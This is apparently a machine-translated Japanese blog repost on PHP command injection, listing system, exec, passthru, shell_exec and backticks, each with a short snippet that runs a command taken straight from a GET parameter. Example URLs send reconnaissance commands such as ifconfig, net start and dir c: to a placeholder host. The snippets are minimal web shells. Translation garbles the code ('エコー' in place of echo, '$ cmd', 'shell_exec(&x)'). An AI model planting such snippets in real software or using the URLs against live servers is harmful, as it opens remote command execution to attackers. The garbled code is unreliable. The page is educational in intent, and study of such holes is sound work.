コマンドインジェクションの脆弱性

その他 2020-04-14 10:32:51 訪問数: null

次のphpコマンド実行関数は、外部のアプリケーションまたは関数を実行できます。

1.システムが外部アプリケーションを実行し、結果を出力します  

原型:string system(String command、int&return_var)

commandは実行されるコマンドで、return_varは実行されたコマンドの実行後のステータス値を格納します。

<?php

$ cmd = $ _ GET ["c"];

エコー "<pre>";

system($ cmd);

エコー "</ pre>";

?>

ブラウザでこのPHPファイルにアクセスし、cmdコンテンツをnet startとして送信して、Webサーバーホストで有効になっているサービスを確認します。

http://xx.com/x.php?c=ifconfig

http://xx.com/x.php?c=net start

http://xx.com/x.php?c=コマンド

http://xx.com/x.php?c=dir c:

2. execが外部アプリケーションを実行します

原型:string exec(String command、array&output、int&return_var)

commandは実行されるコマンド、outputは実行コマンドによって出力される文字列の各行を取得すること、そしてreturn_varはコマンドの実行後にステータス値を格納します。

<?php

$ x = $ _ GET ["x"];

echo shell_exec(&x);

?>

3. passthruはUNIXシステムコマンドを実行し、元の出力を表示します

原型:void passthru(string command、int&return_var)

<?php

$ cmd = $ _ GET ["cmd"];

エコー "<pre>";

passthru($ cmd);

エコー "</ pre>";

?>

4. shell_execはシェルコマンドを実行し、出力文字列を返します

プロトタイプ:string shell_exec(stringコマンド)

<?php

$ cmd = $ _ GET ["cmd"];

エコー "<pre>";

shell_exec($ cmd);

エコー "</ pre>";

?>

5. "''"演算子:shell_exec関数と同じ関数

 

1999年に戦った謎の男
公開された782件の元の記事 いいね76 訪問140,000+
彼のメッセージボードの 懸念

おすすめ

転載: blog.csdn.net/qq_41723615/article/details/105500827
おすすめ
Open Source Daily | Chrome に組み込まれている Gemini の重要性は、中国の AI 追求に関する 5 つの大きな誤解ではありません。ECharts の創設者は魚を育てるために「海に行った」が、何もありません。驚き
中国のAIチームが「米国のために準備を進めている」という噂にマイクロソフトが反応
ランキング
配列内の重複要素を検索し、繰り返し回数の最小値から最大値までの順に並べ替えます es6
【C++学習記】Ten、C++デザインパターン - 抽象ファクトリーパターン
知人:素人の言語ランタイム(A)に
ist „collision.relativeVelocity.magnitude“ in Unity
Linuxダイナミックリンク(3)のPLTとGOTについて話す-パブリックGOTエントリ
leetcode。図L.207カリキュラム-Java
羅区[] P3518 [POI2011] SEJ、金庫
MySQL にクエリを実行するときに使用するインデックスを指定します
現在のユーザー環境変数とシステムのWin10ベースのビュー
十二の仕事 - あなたの誕生日
アーカイブ
もっと
2024-05-15(5)
2024-05-14(9)
2024-05-13(8)
2024-05-12(27)
2024-05-11(31)
2024-05-10(33)
2024-05-09(30)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)

コードワールド

© 2018 codetd.com